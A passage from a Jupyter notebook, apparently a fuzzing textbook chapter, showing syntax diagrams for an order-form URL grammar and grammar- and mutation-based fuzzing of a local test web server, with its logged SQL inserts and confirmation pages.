       "<svg xmlns=\"http://www.w3.org/2000/svg\" class=\"railroad-diagram\" height=\"122\" viewBox=\"0 0 199.5 122\" width=\"199.5\">\n",
       "<g transform=\"translate(.5 .5)\">\n",
       "<style>/* <![CDATA[ */\n",
       "    svg.railroad-diagram {\n",
       "    }\n",
       "    svg.railroad-diagram path {\n",
       "        stroke-width:3;\n",
       "        stroke:black;\n",
       "        fill:white;\n",
       "    }\n",
       "    svg.railroad-diagram text {\n",
       "        font:14px \"Fira Mono\", monospace;\n",
       "        text-anchor:middle;\n",
       "    }\n",
       "    svg.railroad-diagram text.label{\n",
       "        text-anchor:start;\n",
       "    }\n",
       "    svg.railroad-diagram text.comment{\n",
       "        font:italic 12px \"Fira Mono\", monospace;\n",
       "    }\n",
       "    svg.railroad-diagram rect{\n",
       "        stroke-width:2;\n",
       "        stroke:black;\n",
       "        fill:mistyrose;\n",
       "    }\n",
       "\n",
       "/* ]]> */\n",
       "</style><g>\n",
       "<path d=\"M20 51v20m10 -20v20m-10 -10h20\"/></g><g>\n",
       "<path d=\"M40 61h0.0\"/><path d=\"M159.5 61h0.0\"/><path d=\"M40.0 61a10 10 0 0 0 10 -10v-10a10 10 0 0 1 10 -10\"/><g>\n",
       "<path d=\"M60.0 31h4.25\"/><path d=\"M135.25 31h4.25\"/><g class=\"terminal\">\n",
       "<path d=\"M64.25 31h0.0\"/><path d=\"M135.25 31h0.0\"/><rect height=\"22\" rx=\"10\" ry=\"10\" width=\"71.0\" x=\"64.25\" y=\"20\"/><text x=\"99.75\" y=\"35\">tshirt</text></g></g><path d=\"M139.5 31a10 10 0 0 1 10 10v10a10 10 0 0 0 10 10\"/><path d=\"M40.0 61h20\"/><g>\n",
       "<path d=\"M60.0 61h8.5\"/><path d=\"M131.0 61h8.5\"/><g class=\"terminal\">\n",
       "<path d=\"M68.5 61h0.0\"/><path d=\"M131.0 61h0.0\"/><rect height=\"22\" rx=\"10\" ry=\"10\" width=\"62.5\" x=\"68.5\" y=\"50\"/><text x=\"99.75\" y=\"65\">drill</text></g></g><path d=\"M139.5 61h20\"/><path d=\"M40.0 61a10 10 0 0 1 10 10v10a10 10 0 0 0 10 10\"/><g>\n",
       "<path d=\"M60.0 91h0.0\"/><path d=\"M139.5 91h0.0\"/><g class=\"terminal\">\n",
       "<path d=\"M60.0 91h0.0\"/><path d=\"M139.5 91h0.0\"/><rect height=\"22\" rx=\"10\" ry=\"10\" width=\"79.5\" x=\"60.0\" y=\"80\"/><text x=\"99.75\" y=\"95\">lockset</text></g></g><path d=\"M139.5 91a10 10 0 0 0 10 -10v-10a10 10 0 0 1 10 -10\"/></g><path d=\"M 159.5 61 h 20 m -10 -10 v 20 m 10 -20 v 20\"/></g></svg>"
      ],
      "text/plain": [
       "<IPython.core.display.SVG object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "name": "stdout",
     "output_type": "stream",
     "text": [
      "name\n"
     ]
    },
    {
     "data": {
      "image/svg+xml": [
       "<svg xmlns=\"http://www.w3.org/2000/svg\" class=\"railroad-diagram\" height=\"92\" viewBox=\"0 0 225.0 92\" width=\"225.0\">\n",
       "<g transform=\"translate(.5 .5)\">\n",
       "<style>/* <![CDATA[ */\n",
       "    svg.railroad-diagram {\n",
       "    }\n",
       "    svg.railroad-diagram path {\n",
       "        stroke-width:3;\n",
       "        stroke:black;\n",
       "        fill:white;\n",
       "    }\n",
       "    svg.railroad-diagram text {\n",
       "        font:14px \"Fira Mono\", monospace;\n",
       "        text-anchor:middle;\n",
       "    }\n",
       "    svg.railroad-diagram text.label{\n",
       "        text-anchor:start;\n",
       "    }\n",
       "    svg.railroad-diagram text.comment{\n",
       "        font:italic 12px \"Fira Mono\", monospace;\n",
       "    }\n",
       "    svg.railroad-diagram rect{\n",
       "        stroke-width:2;\n",
       "        stroke:black;\n",
       "        fill:mistyrose;\n",
       "    }\n",
       "\n",
       "/* ]]> */\n",
       "</style><g>\n",
       "<path d=\"M20 51v20m10 -20v20m-10 -10h20\"/></g><g>\n",
       "<path d=\"M40 61h0.0\"/><path d=\"M185.0 61h0.0\"/><path d=\"M40.0 61a10 10 0 0 0 10 -10v-10a10 10 0 0 1 10 -10\"/><g>\n",
       "<path d=\"M60.0 31h8.5\"/><path d=\"M156.5 31h8.5\"/><g class=\"terminal\">\n",
       "<path d=\"M68.5 31h0.0\"/><path d=\"M156.5 31h0.0\"/><rect height=\"22\" rx=\"10\" ry=\"10\" width=\"88.0\" x=\"68.5\" y=\"20\"/><text x=\"112.5\" y=\"35\">Jane+Doe</text></g></g><path d=\"M165.0 31a10 10 0 0 1 10 10v10a10 10 0 0 0 10 10\"/><path d=\"M40.0 61h20\"/><g>\n",
       "<path d=\"M60.0 61h0.0\"/><path d=\"M165.0 61h0.0\"/><g class=\"terminal\">\n",
       "<path d=\"M60.0 61h0.0\"/><path d=\"M165.0 61h0.0\"/><rect height=\"22\" rx=\"10\" ry=\"10\" width=\"105.0\" x=\"60.0\" y=\"50\"/><text x=\"112.5\" y=\"65\">John+Smith</text></g></g><path d=\"M165.0 61h20\"/></g><path d=\"M 185.0 61 h 20 m -10 -10 v 20 m 10 -20 v 20\"/></g></svg>"
      ],
      "text/plain": [
       "<IPython.core.display.SVG object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "name": "stdout",
     "output_type": "stream",
     "text": [
      "email\n"
     ]
    },
    {
     "data": {
      "image/svg+xml": [
       "<svg xmlns=\"http://www.w3.org/2000/svg\" class=\"railroad-diagram\" height=\"92\" viewBox=\"0 0 318.5 92\" width=\"318.5\">\n",
       "<g transform=\"translate(.5 .5)\">\n",
       "<style>/* <![CDATA[ */\n",
       "    svg.railroad-diagram {\n",
       "    }\n",
       "    svg.railroad-diagram path {\n",
       "        stroke-width:3;\n",
       "        stroke:black;\n",
       "        fill:white;\n",
       "    }\n",
       "    svg.railroad-diagram text {\n",
       "        font:14px \"Fira Mono\", monospace;\n",
       "        text-anchor:middle;\n",
       "    }\n",
       "    svg.railroad-diagram text.label{\n",
       "        text-anchor:start;\n",
       "    }\n",
       "    svg.railroad-diagram text.comment{\n",
       "        font:italic 12px \"Fira Mono\", monospace;\n",
       "    }\n",
       "    svg.railroad-diagram rect{\n",
       "        stroke-width:2;\n",
       "        stroke:black;\n",
       "        fill:mistyrose;\n",
       "    }\n",
       "\n",
       "/* ]]> */\n",
       "</style><g>\n",
       "<path d=\"M20 51v20m10 -20v20m-10 -10h20\"/></g><g>\n",
       "<path d=\"M40 61h0.0\"/><path d=\"M278.5 61h0.0\"/><path d=\"M40.0 61a10 10 0 0 0 10 -10v-10a10 10 0 0 1 10 -10\"/><g>\n",
       "<path d=\"M60.0 31h8.5\"/><path d=\"M250.0 31h8.5\"/><g class=\"terminal\">\n",
       "<path d=\"M68.5 31h0.0\"/><path d=\"M250.0 31h0.0\"/><rect height=\"22\" rx=\"10\" ry=\"10\" width=\"181.5\" x=\"68.5\" y=\"20\"/><text x=\"159.25\" y=\"35\">j.doe%40example.com</text></g></g><path d=\"M258.5 31a10 10 0 0 1 10 10v10a10 10 0 0 0 10 10\"/><path d=\"M40.0 61h20\"/><g>\n",
       "<path d=\"M60.0 61h0.0\"/><path d=\"M258.5 61h0.0\"/><g class=\"terminal\">\n",
       "<path d=\"M60.0 61h0.0\"/><path d=\"M258.5 61h0.0\"/><rect height=\"22\" rx=\"10\" ry=\"10\" width=\"198.5\" x=\"60.0\" y=\"50\"/><text x=\"159.25\" y=\"65\">j_smith%40example.com</text></g></g><path d=\"M258.5 61h20\"/></g><path d=\"M 278.5 61 h 20 m -10 -10 v 20 m 10 -20 v 20\"/></g></svg>"
      ],
      "text/plain": [
       "<IPython.core.display.SVG object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "name": "stdout",
     "output_type": "stream",
     "text": [
      "city\n"
     ]
    },
    {
     "data": {
      "image/svg+xml": [
       "<svg xmlns=\"http://www.w3.org/2000/svg\" class=\"railroad-diagram\" height=\"92\" viewBox=\"0 0 208.0 92\" width=\"208.0\">\n",
       "<g transform=\"translate(.5 .5)\">\n",
       "<style>/* <![CDATA[ */\n",
       "    svg.railroad-diagram {\n",
       "    }\n",
       "    svg.railroad-diagram path {\n",
       "        stroke-width:3;\n",
       "        stroke:black;\n",
       "        fill:white;\n",
       "    }\n",
       "    svg.railroad-diagram text {\n",
       "        font:14px \"Fira Mono\", monospace;\n",
       "        text-anchor:middle;\n",
       "    }\n",
       "    svg.railroad-diagram text.label{\n",
       "        text-anchor:start;\n",
       "    }\n",
       "    svg.railroad-diagram text.comment{\n",
       "        font:italic 12px \"Fira Mono\", monospace;\n",
       "    }\n",
       "    svg.railroad-diagram rect{\n",
       "        stroke-width:2;\n",
       "        stroke:black;\n",
       "        fill:mistyrose;\n",
       "    }\n",
       "\n",
       "/* ]]> */\n",
       "</style><g>\n",
       "<path d=\"M20 51v20m10 -20v20m-10 -10h20\"/></g><g>\n",
       "<path d=\"M40 61h0.0\"/><path d=\"M168.0 61h0.0\"/><path d=\"M40.0 61a10 10 0 0 0 10 -10v-10a10 10 0 0 1 10 -10\"/><g>\n",
       "<path d=\"M60.0 31h4.25\"/><path d=\"M143.75 31h4.25\"/><g class=\"terminal\">\n",
       "<path d=\"M64.25 31h0.0\"/><path d=\"M143.75 31h0.0\"/><rect height=\"22\" rx=\"10\" ry=\"10\" width=\"79.5\" x=\"64.25\" y=\"20\"/><text x=\"104.0\" y=\"35\">Seattle</text></g></g><path d=\"M148.0 31a10 10 0 0 1 10 10v10a10 10 0 0 0 10 10\"/><path d=\"M40.0 61h20\"/><g>\n",
       "<path d=\"M60.0 61h0.0\"/><path d=\"M148.0 61h0.0\"/><g class=\"terminal\">\n",
       "<path d=\"M60.0 61h0.0\"/><path d=\"M148.0 61h0.0\"/><rect height=\"22\" rx=\"10\" ry=\"10\" width=\"88.0\" x=\"60.0\" y=\"50\"/><text x=\"104.0\" y=\"65\">New+York</text></g></g><path d=\"M148.0 61h20\"/></g><path d=\"M 168.0 61 h 20 m -10 -10 v 20 m 10 -20 v 20\"/></g></svg>"
      ],
      "text/plain": [
       "<IPython.core.display.SVG object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "name": "stdout",
     "output_type": "stream",
     "text": [
      "zip\n"
     ]
    },
    {
     "data": {
      "image/svg+xml": [
       "<svg xmlns=\"http://www.w3.org/2000/svg\" class=\"railroad-diagram\" height=\"62\" viewBox=\"0 0 512.5 62\" width=\"512.5\">\n",
       "<g transform=\"translate(.5 .5)\">\n",
       "<style>/* <![CDATA[ */\n",
       "    svg.railroad-diagram {\n",
       "    }\n",
       "    svg.railroad-diagram path {\n",
       "        stroke-width:3;\n",
       "        stroke:black;\n",
       "        fill:white;\n",
       "    }\n",
       "    svg.railroad-diagram text {\n",
       "        font:14px \"Fira Mono\", monospace;\n",
       "        text-anchor:middle;\n",
       "    }\n",
       "    svg.railroad-diagram text.label{\n",
       "        text-anchor:start;\n",
       "    }\n",
       "    svg.railroad-diagram text.comment{\n",
       "        font:italic 12px \"Fira Mono\", monospace;\n",
       "    }\n",
       "    svg.railroad-diagram rect{\n",
       "        stroke-width:2;\n",
       "        stroke:black;\n",
       "        fill:mistyrose;\n",
       "    }\n",
       "\n",
       "/* ]]> */\n",
       "</style><g>\n",
       "<path d=\"M20 21v20m10 -20v20m-10 -10h20\"/></g><g>\n",
       "<path d=\"M40 31h0.0\"/><path d=\"M472.5 31h0.0\"/><path d=\"M40.0 31h20\"/><g>\n",
       "<path d=\"M60.0 31h0.0\"/><path d=\"M452.5 31h0.0\"/><g class=\"non-terminal\">\n",
       "<path d=\"M60.0 31h0.0\"/><path d=\"M122.5 31h0.0\"/><rect height=\"22\" width=\"62.5\" x=\"60.0\" y=\"20\"/><text x=\"91.25\" y=\"35\">digit</text></g><path d=\"M122.5 31h10\"/><path d=\"M132.5 31h10\"/><g class=\"non-terminal\">\n",
       "<path d=\"M142.5 31h0.0\"/><path d=\"M205.0 31h0.0\"/><rect height=\"22\" width=\"62.5\" x=\"142.5\" y=\"20\"/><text x=\"173.75\" y=\"35\">digit</text></g><path d=\"M205.0 31h10\"/><path d=\"M215.0 31h10\"/><g class=\"non-terminal\">\n",
       "<path d=\"M225.0 31h0.0\"/><path d=\"M287.5 31h0.0\"/><rect height=\"22\" width=\"62.5\" x=\"225.0\" y=\"20\"/><text x=\"256.25\" y=\"35\">digit</text></g><path d=\"M287.5 31h10\"/><path d=\"M297.5 31h10\"/><g class=\"non-terminal\">\n",
       "<path d=\"M307.5 31h0.0\"/><path d=\"M370.0 31h0.0\"/><rect height=\"22\" width=\"62.5\" x=\"307.5\" y=\"20\"/><text x=\"338.75\" y=\"35\">digit</text></g><path d=\"M370.0 31h10\"/><path d=\"M380.0 31h10\"/><g class=\"non-terminal\">\n",
       "<path d=\"M390.0 31h0.0\"/><path d=\"M452.5 31h0.0\"/><rect height=\"22\" width=\"62.5\" x=\"390.0\" y=\"20\"/><text x=\"421.25\" y=\"35\">digit</text></g></g><path d=\"M452.5 31h20\"/></g><path d=\"M 472.5 31 h 20 m -10 -10 v 20 m 10 -20 v 20\"/></g></svg>"
      ],
      "text/plain": [
       "<IPython.core.display.SVG object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "name": "stdout",
     "output_type": "stream",
     "text": [
      "digit\n"
     ]
    },
    {
     "data": {
      "image/svg+xml": [
       "<svg xmlns=\"http://www.w3.org/2000/svg\" class=\"railroad-diagram\" height=\"109\" viewBox=\"0 0 522.5 109\" width=\"522.5\">\n",
       "<g transform=\"translate(.5 .5)\">\n",
       "<style>/* <![CDATA[ */\n",
       "    svg.railroad-diagram {\n",
       "    }\n",
       "    svg.railroad-diagram path {\n",
       "        stroke-width:3;\n",
       "        stroke:black;\n",
       "        fill:white;\n",
       "    }\n",
       "    svg.railroad-diagram text {\n",
       "        font:14px \"Fira Mono\", monospace;\n",
       "        text-anchor:middle;\n",
       "    }\n",
       "    svg.railroad-diagram text.label{\n",
       "        text-anchor:start;\n",
       "    }\n",
       "    svg.railroad-diagram text.comment{\n",
       "        font:italic 12px \"Fira Mono\", monospace;\n",
       "    }\n",
       "    svg.railroad-diagram rect{\n",
       "        stroke-width:2;\n",
       "        stroke:black;\n",
       "        fill:mistyrose;\n",
       "    }\n",
       "\n",
       "/* ]]> */\n",
       "</style><g>\n",
       "<path d=\"M20 59v20m10 -20v20m-10 -10h20\"/></g><g>\n",
       "<path d=\"M40 69h0.0\"/><path d=\"M482.5 69h0.0\"/><path d=\"M40.0 69a10 10 0 0 0 10 -10v-29a10 10 0 0 1 10 -10h324.0\"/><path d=\"M138.5 89h324.0a10 10 0 0 0 10 -10v0a10 10 0 0 1 10 -10\"/><path d=\"M40.0 69h10\"/><g>\n",
       "<path d=\"M50.0 69h0.0\"/><path d=\"M118.5 69h0.0\"/><path d=\"M50.0 69a10 10 0 0 0 10 -10v-10a10 10 0 0 1 10 -10\"/><g>\n",
       "<path d=\"M70.0 39h0.0\"/><path d=\"M98.5 39h0.0\"/><g class=\"terminal\">\n",
       "<path d=\"M70.0 39h0.0\"/><path d=\"M98.5 39h0.0\"/><rect height=\"22\" rx=\"10\" ry=\"10\" width=\"28.5\" x=\"70.0\" y=\"28\"/><text x=\"84.25\" y=\"43\">0</text></g></g><path d=\"M98.5 39a10 10 0 0 1 10 10v10a10 10 0 0 0 10 10\"/><path d=\"M50.0 69h20\"/><g>\n",
       "<path d=\"M70.0 69h0.0\"/><path d=\"M98.5 69h0.0\"/><g class=\"terminal\">\n",
       "<path d=\"M70.0 69h0.0\"/><path d=\"M98.5 69h0.0\"/><rect height=\"22\" rx=\"10\" ry=\"10\" width=\"28.5\" x=\"70.0\" y=\"58\"/><text x=\"84.25\" y=\"73\">1</text></g></g><path d=\"M98.5 69h20\"/></g><path d=\"M118.5 69a10 10 0 0 1 10 10v0a10 10 0 0 0 10 10\"/><path d=\"M118.5 20a10 10 0 0 1 10 10v29a10 10 0 0 0 10 10\"/><g>\n",
       "<path d=\"M138.5 69h0.0\"/><path d=\"M207.0 69h0.0\"/><path d=\"M138.5 69a10 10 0 0 0 10 -10v-10a10 10 0 0 1 10 -10\"/><g>\n",
       "<path d=\"M158.5 39h0.0\"/><path d=\"M187.0 39h0.0\"/><g class=\"terminal\">\n",
       "<path d=\"M158.5 39h0.0\"/><path d=\"M187.0 39h0.0\"/><rect height=\"22\" rx=\"10\" ry=\"10\" width=\"28.5\" x=\"158.5\" y=\"28\"/><text x=\"172.75\" y=\"43\">2</text></g></g><path d=\"M187.0 39a10 10 0 0 1 10 10v10a10 10 0 0 0 10 10\"/><path d=\"M138.5 69h20\"/><g>\n",
       "<path d=\"M158.5 69h0.0\"/><path d=\"M187.0 69h0.0\"/><g class=\"terminal\">\n",
       "<path d=\"M158.5 69h0.0\"/><path d=\"M187.0 69h0.0\"/><rect height=\"22\" rx=\"10\" ry=\"10\" width=\"28.5\" x=\"158.5\" y=\"58\"/><text x=\"172.75\" y=\"73\">3</text></g></g><path d=\"M187.0 69h20\"/></g><path d=\"M207.0 69a10 10 0 0 1 10 10v0a10 10 0 0 0 10 10\"/><path d=\"M207.0 20a10 10 0 0 1 10 10v29a10 10 0 0 0 10 10\"/><g>\n",
       "<path d=\"M227.0 69h0.0\"/><path d=\"M295.5 69h0.0\"/><path d=\"M227.0 69a10 10 0 0 0 10 -10v-10a10 10 0 0 1 10 -10\"/><g>\n",
       "<path d=\"M247.0 39h0.0\"/><path d=\"M275.5 39h0.0\"/><g class=\"terminal\">\n",
       "<path d=\"M247.0 39h0.0\"/><path d=\"M275.5 39h0.0\"/><rect height=\"22\" rx=\"10\" ry=\"10\" width=\"28.5\" x=\"247.0\" y=\"28\"/><text x=\"261.25\" y=\"43\">4</text></g></g><path d=\"M275.5 39a10 10 0 0 1 10 10v10a10 10 0 0 0 10 10\"/><path d=\"M227.0 69h20\"/><g>\n",
       "<path d=\"M247.0 69h0.0\"/><path d=\"M275.5 69h0.0\"/><g class=\"terminal\">\n",
       "<path d=\"M247.0 69h0.0\"/><path d=\"M275.5 69h0.0\"/><rect height=\"22\" rx=\"10\" ry=\"10\" width=\"28.5\" x=\"247.0\" y=\"58\"/><text x=\"261.25\" y=\"73\">5</text></g></g><path d=\"M275.5 69h20\"/></g><path d=\"M295.5 69a10 10 0 0 1 10 10v0a10 10 0 0 0 10 10\"/><path d=\"M295.5 20a10 10 0 0 1 10 10v29a10 10 0 0 0 10 10\"/><g>\n",
       "<path d=\"M315.5 69h0.0\"/><path d=\"M384.0 69h0.0\"/><path d=\"M315.5 69a10 10 0 0 0 10 -10v-10a10 10 0 0 1 10 -10\"/><g>\n",
       "<path d=\"M335.5 39h0.0\"/><path d=\"M364.0 39h0.0\"/><g class=\"terminal\">\n",
       "<path d=\"M335.5 39h0.0\"/><path d=\"M364.0 39h0.0\"/><rect height=\"22\" rx=\"10\" ry=\"10\" width=\"28.5\" x=\"335.5\" y=\"28\"/><text x=\"349.75\" y=\"43\">6</text></g></g><path d=\"M364.0 39a10 10 0 0 1 10 10v10a10 10 0 0 0 10 10\"/><path d=\"M315.5 69h20\"/><g>\n",
       "<path d=\"M335.5 69h0.0\"/><path d=\"M364.0 69h0.0\"/><g class=\"terminal\">\n",
       "<path d=\"M335.5 69h0.0\"/><path d=\"M364.0 69h0.0\"/><rect height=\"22\" rx=\"10\" ry=\"10\" width=\"28.5\" x=\"335.5\" y=\"58\"/><text x=\"349.75\" y=\"73\">7</text></g></g><path d=\"M364.0 69h20\"/></g><path d=\"M384.0 69a10 10 0 0 1 10 10v0a10 10 0 0 0 10 10\"/><path d=\"M384.0 20a10 10 0 0 1 10 10v29a10 10 0 0 0 10 10\"/><g>\n",
       "<path d=\"M404.0 69h0.0\"/><path d=\"M472.5 69h0.0\"/><path d=\"M404.0 69a10 10 0 0 0 10 -10v-10a10 10 0 0 1 10 -10\"/><g>\n",
       "<path d=\"M424.0 39h0.0\"/><path d=\"M452.5 39h0.0\"/><g class=\"terminal\">\n",
       "<path d=\"M424.0 39h0.0\"/><path d=\"M452.5 39h0.0\"/><rect height=\"22\" rx=\"10\" ry=\"10\" width=\"28.5\" x=\"424.0\" y=\"28\"/><text x=\"438.25\" y=\"43\">8</text></g></g><path d=\"M452.5 39a10 10 0 0 1 10 10v10a10 10 0 0 0 10 10\"/><path d=\"M404.0 69h20\"/><g>\n",
       "<path d=\"M424.0 69h0.0\"/><path d=\"M452.5 69h0.0\"/><g class=\"terminal\">\n",
       "<path d=\"M424.0 69h0.0\"/><path d=\"M452.5 69h0.0\"/><rect height=\"22\" rx=\"10\" ry=\"10\" width=\"28.5\" x=\"424.0\" y=\"58\"/><text x=\"438.25\" y=\"73\">9</text></g></g><path d=\"M452.5 69h20\"/></g><path d=\"M472.5 69h10\"/></g><path d=\"M 482.5 69 h 20 m -10 -10 v 20 m 10 -20 v 20\"/></g></svg>"
      ],
      "text/plain": [
       "<IPython.core.display.SVG object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    }
   ],
   "source": [
    "syntax_diagram(ORDER_GRAMMAR)"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "source": [
    "Using [one of our grammar fuzzers](GrammarFuzzer.iynb), we can instantiate this grammar and generate URLs:"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 83,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.069015Z",
     "iopub.status.busy": "2025-01-16T10:12:26.068935Z",
     "iopub.status.idle": "2025-01-16T10:12:26.095023Z",
     "shell.execute_reply": "2025-01-16T10:12:26.094779Z"
    },
    "slideshow": {
     "slide_type": "skip"
    }
   },
   "outputs": [],
   "source": [
    "from GrammarFuzzer import GrammarFuzzer"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 84,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.096641Z",
     "iopub.status.busy": "2025-01-16T10:12:26.096567Z",
     "iopub.status.idle": "2025-01-16T10:12:26.100186Z",
     "shell.execute_reply": "2025-01-16T10:12:26.099959Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [
    {
     "data": {
      "text/plain": [
       "['/order?item=drill&name=Jane+Doe&email=j.doe%40example.com&city=New+York&zip=42436',\n",
       " '/order?item=drill&name=John+Smith&email=j_smith%40example.com&city=New+York&zip=56213',\n",
       " '/order?item=drill&name=Jane+Doe&email=j_smith%40example.com&city=Seattle&zip=63628',\n",
       " '/order?item=drill&name=John+Smith&email=j.doe%40example.com&city=Seattle&zip=59538',\n",
       " '/order?item=drill&name=Jane+Doe&email=j_smith%40example.com&city=New+York&zip=41160']"
      ]
     },
     "execution_count": 84,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "order_fuzzer = GrammarFuzzer(ORDER_GRAMMAR)\n",
    "[order_fuzzer.fuzz() for i in range(5)]"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "Sending these URLs to the server will have them processed correctly:"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 85,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.101638Z",
     "iopub.status.busy": "2025-01-16T10:12:26.101557Z",
     "iopub.status.idle": "2025-01-16T10:12:26.108277Z",
     "shell.execute_reply": "2025-01-16T10:12:26.108032Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [
    {
     "data": {
      "text/html": [
       "<pre style=\"background: NavajoWhite;\">127.0.0.1 - - [16/Jan/2025 11:12:26] INSERT INTO orders VALUES ('lockset', 'Jane Doe', 'j_smith@example.com', 'Seattle', '16631')\n",
       "</pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre style=\"background: NavajoWhite;\">127.0.0.1 - - [16/Jan/2025 11:12:26] \"GET /order?item=lockset&name=Jane+Doe&email=j_smith%40example.com&city=Seattle&zip=16631 HTTP/1.1\" 200 -\n",
       "</pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "\n",
       "<html><body>\n",
       "<div style=\"border:3px; border-style:solid; border-color:#FF0000; padding: 1em;\">\n",
       "  <strong id=\"title\" style=\"font-size: x-large\">Thank you for your Fuzzingbook Order!</strong>\n",
       "  <p id=\"confirmation\">\n",
       "  We will send <strong>One FuzzingBook Lock Set</strong> to Jane Doe in Seattle, 16631<br>\n",
       "  A confirmation mail will be sent to j_smith@example.com.\n",
       "  </p>\n",
       "  <p>\n",
       "  Want more swag?  Use our <a href=\"/\">order form</a>!\n",
       "  </p>\n",
       "</div>\n",
       "</body></html>\n"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "execution_count": 85,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "HTML(webbrowser(urljoin(httpd_url, order_fuzzer.fuzz())))"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 86,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.109640Z",
     "iopub.status.busy": "2025-01-16T10:12:26.109542Z",
     "iopub.status.idle": "2025-01-16T10:12:26.111341Z",
     "shell.execute_reply": "2025-01-16T10:12:26.111103Z"
    },
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "outputs": [
    {
     "name": "stdout",
     "output_type": "stream",
     "text": [
      "[('tshirt', 'Jane Doe', 'doe@example.com', 'Seattle', '98104'), ('lockset', 'Jane Doe', 'j_smith@example.com', 'Seattle', '16631')]\n"
     ]
    }
   ],
   "source": [
    "print(db.execute(\"SELECT * FROM orders\").fetchall())"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "source": [
    "### Fuzzing with Unexpected Values"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "We can now see that the server does a good job when faced with \"standard\" values.  But what happens if we feed it non-standard values?  To this end, we make use of a [mutation fuzzer](MutationFuzzer.ipynb) which inserts random changes into the URL.  Our seed (i.e. the value to be mutated) comes from the grammar fuzzer:"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 87,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.112689Z",
     "iopub.status.busy": "2025-01-16T10:12:26.112600Z",
     "iopub.status.idle": "2025-01-16T10:12:26.114778Z",
     "shell.execute_reply": "2025-01-16T10:12:26.114574Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [
    {
     "data": {
      "text/plain": [
       "'/order?item=drill&name=Jane+Doe&email=j.doe%40example.com&city=Seattle&zip=45732'"
      ]
     },
     "execution_count": 87,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "seed = order_fuzzer.fuzz()\n",
    "seed"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "Mutating this string yields mutations not only in the field values, but also in field names as well as the URL structure."
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 88,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.116125Z",
     "iopub.status.busy": "2025-01-16T10:12:26.116034Z",
     "iopub.status.idle": "2025-01-16T10:12:26.117542Z",
     "shell.execute_reply": "2025-01-16T10:12:26.117345Z"
    },
    "slideshow": {
     "slide_type": "skip"
    }
   },
   "outputs": [],
   "source": [
    "from MutationFuzzer import MutationFuzzer  # minor deoendency"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 89,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.118865Z",
     "iopub.status.busy": "2025-01-16T10:12:26.118792Z",
     "iopub.status.idle": "2025-01-16T10:12:26.121013Z",
     "shell.execute_reply": "2025-01-16T10:12:26.120778Z"
    },
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "outputs": [
    {
     "data": {
      "text/plain": [
       "['/order?item=drill&name=Jane+Doe&email=j.doe%40example.com&city=Seattle&zip=45732',\n",
       " '/order?item=drill&name=Jane+Doe&email=.doe%40example.com&city=Seattle&zip=45732',\n",
       " '/order?item=drill;&name=Jane+Doe&email=j.doe%40example.com&city=Seattle&zip=45732',\n",
       " '/order?item=drill&name=Jane+Doe&emil=j.doe%40example.com&city=Seattle&zip=45732',\n",
       " '/order?item=drill&name=Jane+Doe&email=j.doe%40example.com&city=Seattle&zip=4732']"
      ]
     },
     "execution_count": 89,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "mutate_order_fuzzer = MutationFuzzer([seed], min_mutations=1, max_mutations=1)\n",
    "[mutate_order_fuzzer.fuzz() for i in range(5)]"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "Let us fuzz a little until we get an internal server error.  We use the Python `requests` module to interact with the Web server such that we can directly access the HTTP status code."
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 90,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:26.122413Z",
     "iopub.status.busy": "2025-01-16T10:12:26.122332Z",
     "iopub.status.idle": "2025-01-16T10:12:26.130059Z",
     "shell.execute_reply": "2025-01-16T10:12:26.129806Z"
    },
    "slideshow": {
     "slide_type": "subslide"
    }
   },
